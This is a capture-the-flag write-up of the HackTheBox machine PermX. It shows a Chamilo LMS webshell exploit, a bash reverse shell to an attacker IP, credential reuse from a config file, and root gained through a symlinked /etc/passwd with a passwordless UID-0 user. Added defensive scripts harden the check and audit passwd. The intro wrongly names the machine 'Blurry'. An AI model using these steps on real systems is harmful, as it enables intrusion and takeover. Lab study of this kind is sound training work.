PermX - HackTheBox Machine WriteUp
This is my WriteUp for the medium difficulty Linux machine Blurry on HackTheBox Labs.
Recon
My first step was to scan the machine for open ports with nmap:
$ nmap -Pn -sV $LAB_IP
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.52
There were only two open ports:
- Port 22 - ssh
- Port 80 - http (Apache httpd web server, version 2.4.52)
The interesting one for us is the web application on port 80. I used gobuster to search the website for hidden files or directories:
$ gobuster dir -u "http://permx.htb" -w /usr/share/wordlists/dirb/big.txt
===============================================================
/.htpasswd            (Status: 403) [Size: 274]
/.htaccess            (Status: 403) [Size: 274]
/css                  (Status: 301) [Size: 304] [--> http://permx.htb/css/]
/img                  (Status: 301) [Size: 304] [--> http://permx.htb/img/]
/js                   (Status: 301) [Size: 303] [--> http://permx.htb/js/]
/lib                  (Status: 301) [Size: 304] [--> http://permx.htb/lib/]
/server-status        (Status: 403) [Size: 274]
===============================================================
At first sight I found nothing interesting, so I used ffuf to scan for subdomains.
Unfortunately, many subdomains returned the same empty response, so I filtered by HTTP response size with the -fs flag:
$ ffuf -u http://permx.htb/ -H 'Host: FUZZ.permx.htb' -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -c -fs 250-300
---------------------------------------
www                     [Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 17ms]
lms                     [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 57ms]
---------------------------------------
I found the subdomain lms.permx.htb, which hosts a service called Chamilo, an e-learning and collaboration software.
Again, I ran gobuster to find interesting files and directories:
$ gobuster dir -u "http://lms.permx.htb" -w /usr/share/wordlists/dirb/big.txt
===============================================================
/.htpasswd            (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/LICENSE              (Status: 200) [Size: 35147]
/app                  (Status: 301) [Size: 312] [--> http://lms.permx.htb/app/]
/bin                  (Status: 301) [Size: 312] [--> http://lms.permx.htb/bin/]
/certificates         (Status: 301) [Size: 321] [--> http://lms.permx.htb/certificates/]
/documentation        (Status: 301) [Size: 322] [--> http://lms.permx.htb/documentation/]
/favicon.ico          (Status: 200) [Size: 2462]
/main                 (Status: 301) [Size: 313] [--> http://lms.permx.htb/main/]
/plugin               (Status: 301) [Size: 315] [--> http://lms.permx.htb/plugin/]
/robots.txt           (Status: 200) [Size: 748]
/server-status        (Status: 403) [Size: 278]
/src                  (Status: 301) [Size: 312] [--> http://lms.permx.htb/src/]
/vendor               (Status: 301) [Size: 315] [--> http://lms.permx.htb/vendor/]
/web                  (Status: 301) [Size: 312] [--> http://lms.permx.htb/web/]
===============================================================
And indeed, gobuster found some interesting things. The README.md and LICENSE files suggest this is a typical git repository checkout.
I looked into the README.md file and found a version number: 1.11.x
I researched existing vulnerabilities and found a Proof of Concept (PoC) on GitHub for version 1.11.24. We do not know whether our web server is running a version below 1.11.24, but we can try to create a webshell with it. To do so, we clone the git repository:
$ git clone https://github.com/Rai2en/CVE-2023-4220-Chamilo-LMS.git
$ cd CVE-2023-4220-Chamilo-LMS/
I executed the main.py script with our subdomain URL lms.permx.htb and the scan action to check whether our Chamilo instance is vulnerable:
$ python3 main.py -u http://lms.permx.htb -a scan
The result indicated that the Chamilo instance is vulnerable, so we can try to run the exploit and create a webshell with the webshell action:
$ python3 main.py -u http://lms.permx.htb -a webshell
The upload was successful and I was able to send commands to the webshell. I used that to create a reverse shell, and first started my netcat listener on port 5555:
nc -lnvp 5555
Then I URL-encoded the following reverse shell command with CyberChef:
bash -c "/bin/bash -i >& /dev/tcp/10.10.14.151/5555 0>&1"
After everything was set up, I used curl to execute the reverse shell through the webshell we created:
curl "http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/webshell.php?cmd=bash%20%2Dc%20%22%2Fbin%2Fbash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F10%2E10%2E14%2E151%2F5555%200%3E%261%22"
It worked and I got a reverse shell!
Now let's get a foothold.
Foothold
The next step is to look for a config file with useful information (like credentials). We can list the /home/ directory for existing home directories. There I found the home directory of the user mtz.
Then I used the find command a few times to search for interesting files (for example sql, conf or db files):
$ find /var/www/chamilo/ -type f -name 'configuration.php'
/var/www/chamilo/app/config/configuration.php
/var/www/chamilo/plugin/sepe/src/configuration.php
It worked, and in the first few lines of the configuration.php file I found interesting database credentials:
$_configuration['db_host'] = 'localhost';
$_configuration['db_port'] = '3306';
$_configuration['main_database'] = 'chamilo';
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
I tried to log in with the user name mtz and the password 03F6lY3uXAP2bkW8 via ssh:
$ ssh mtz@permx.htb
Password: 03F6lY3uXAP2bkW8
And it worked!
We got our user flag!
Privilege Escalation
Now the last step is to escalate our privileges and gain root access on the PermX machine.
My first step was to list all commands that the user mtz is allowed to run with sudo:
$ sudo -l
(ALL : ALL) NOPASSWD: /opt/acl.sh
The output indicated that we can run the script /opt/acl.sh with root privileges without a password.
The /opt/acl.sh script looks like this:
#!/bin/bash
if [ "$#" -ne 3 ]; then
    /usr/bin/echo "Usage: $0 user perm file"
    exit 1
fi
user="$1"
perm="$2"
target="$3"
if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
    /usr/bin/echo "Access denied."
    exit 1
fi
# Check if the path is a file
if [ ! -f "$target" ]; then
    /usr/bin/echo "Target must be a file."
    exit 1
fi
/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"
It uses the setfacl command, which sets Access Control Lists (ACLs) for files and directories. The script only checks the target path as a string, so a symbolic link inside /home/mtz is accepted and setfacl then follows it. I used GTFOBins and found that there is a privilege escalation method using a writable /etc/passwd file.
I could create a symbolic link to the /etc/passwd file in our home directory:
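As an added example (not part of the write-up or of the PermX machine), here is how the target check in /opt/acl.sh could be hardened so that the symlink trick no longer works: refuse symbolic links outright, then compare canonical paths (resolved with readlink -f) instead of the raw string. The function takes the allowed base directory as an optional second argument (defaulting to /home/mtz as in the original) so it can be exercised on a constructed temporary tree.

```shell
#!/bin/bash
# Added example, not the original /opt/acl.sh: a hardened replacement for its
# path check. The original compares the *string* "$target" against /home/mtz/*,
# so a symlink inside the home directory that points at /etc/passwd passes the
# check and setfacl follows the link. This version refuses symlinks and
# compares canonical paths. Assumes "readlink -f" (GNU coreutils or busybox).

check_target() {
    local target="$1"
    local base="${2:-/home/mtz}"   # allowed directory; /home/mtz as in the original
    local real_target real_base

    # 1. Refuse symbolic links outright: a link under the home directory can
    #    point anywhere, and setfacl would otherwise follow it.
    if [ -L "$target" ]; then
        echo "Access denied: symbolic links are not allowed." >&2
        return 1
    fi

    # 2. Must be an existing regular file (same rule as the original script).
    if [ ! -f "$target" ]; then
        echo "Target must be a file." >&2
        return 1
    fi

    # 3. Canonicalise both paths so ".." components and symlinked *directories*
    #    (e.g. /home/mtz/link_dir/file) are resolved before comparing.
    real_target=$(readlink -f "$target") || return 1
    real_base=$(readlink -f "$base") || return 1

    case "$real_target" in
        "$real_base"/*) return 0 ;;
        *) echo "Access denied." >&2; return 1 ;;
    esac
}

# Self-contained demonstration on a constructed temporary directory tree.
demo_dir=$(mktemp -d)
mkdir -p "$demo_dir/home/mtz"
echo "notes" > "$demo_dir/home/mtz/notes.txt"
ln -s /etc/passwd "$demo_dir/home/mtz/passwd_change"   # the write-up's link
for t in notes.txt passwd_change; do
    if check_target "$demo_dir/home/mtz/$t" "$demo_dir/home/mtz" 2>/dev/null; then
        echo "allowed: $t"
    else
        echo "denied:  $t"
    fi
done
rm -rf "$demo_dir"
```

In the real script the call would be `check_target "$3" || exit 1` before the setfacl line. As a second line of defence, setfacl's -P (--physical) option skips symbolic-link arguments instead of following them, so even a missed link would not change the ACL of the file it points to.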
$ ln -s /etc/passwd /home/mtz/passwd_change
Then I used the /opt/acl.sh script to give our user mtz read and write permissions on the created symbolic link /home/mtz/passwd_change:
$ sudo /opt/acl.sh mtz rw /home/mtz/passwd_change 
The last step was to append a user hacker with root permissions to the writable passwd_change file, which is just a symbolic link to /etc/passwd:
$ echo "hacker::0:0:hacker:/root:/bin/bash" >> ./passwd_change 
After that, I logged in as the newly created user hacker and had root access:
$ su hacker
It worked and I got the root flag.
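From the defender's side, the steps above leave two obvious artefacts in /etc/passwd: a second UID-0 account and an empty password field. The following added example (not from the write-up) is a small audit that flags both; it runs over a constructed passwd-format sample that mimics the appended line, and it can be pointed at a real /etc/passwd or a copy pulled from a suspect host.

```shell
#!/bin/sh
# Added example, not part of the original write-up: audit a passwd-format file
# for the two tell-tale signs of the technique above:
#   * an account other than "root" with UID 0, and
#   * an empty password field (which lets "su" succeed without a password).

# Write a constructed passwd-format sample (not a real host's file) to a path.
write_sample_passwd() {
    cat > "$1" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
mtz:x:1000:1000:mtz:/home/mtz:/bin/bash
hacker::0:0:hacker:/root:/bin/bash
EOF
}

# Print one ALERT line per finding on stderr and the number of findings on stdout.
count_passwd_findings() {
    file="$1"
    findings=0
    # IFS=: splits the seven passwd fields; consecutive colons yield an empty field.
    while IFS=: read -r name pw uid gid gecos home shell; do
        if [ -z "$name" ]; then
            continue
        fi
        if [ "$uid" = "0" ] && [ "$name" != "root" ]; then
            echo "ALERT: non-root account with UID 0: $name (home $home, shell $shell)" >&2
            findings=$((findings + 1))
        fi
        if [ -z "$pw" ]; then
            echo "ALERT: empty password field for account: $name" >&2
            findings=$((findings + 1))
        fi
    done < "$file"
    echo "$findings"
}

# Demonstration on the constructed sample; expect two findings, both for "hacker".
sample=$(mktemp)
write_sample_passwd "$sample"
n=$(count_passwd_findings "$sample")
echo "findings: $n"
rm -f "$sample"
```

On a live system the same two conditions are cheap to monitor continuously, for example by alerting on any write to /etc/passwd that is not made by the usual account-management tools.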
Exploit Chain
Recon:
- Port scan with nmap
- Find the lms subdomain with ffuf
- Find the README.md file and get the version of the Chamilo LMS service
- Research Chamilo 1.11.x vulnerabilities
- Run the Chamilo LMS exploit, which creates a webshell
- Use the webshell to start a reverse shell
Foothold:
- Search the machine for configuration or sensitive files
- Find database credentials
- Reuse the password with ssh
Privilege Escalation:
- List allowed commands that mtz can run with sudo
- Search for vulnerabilities in the /opt/acl.sh script
- Abuse the writable /etc/passwd vulnerability to get a root shell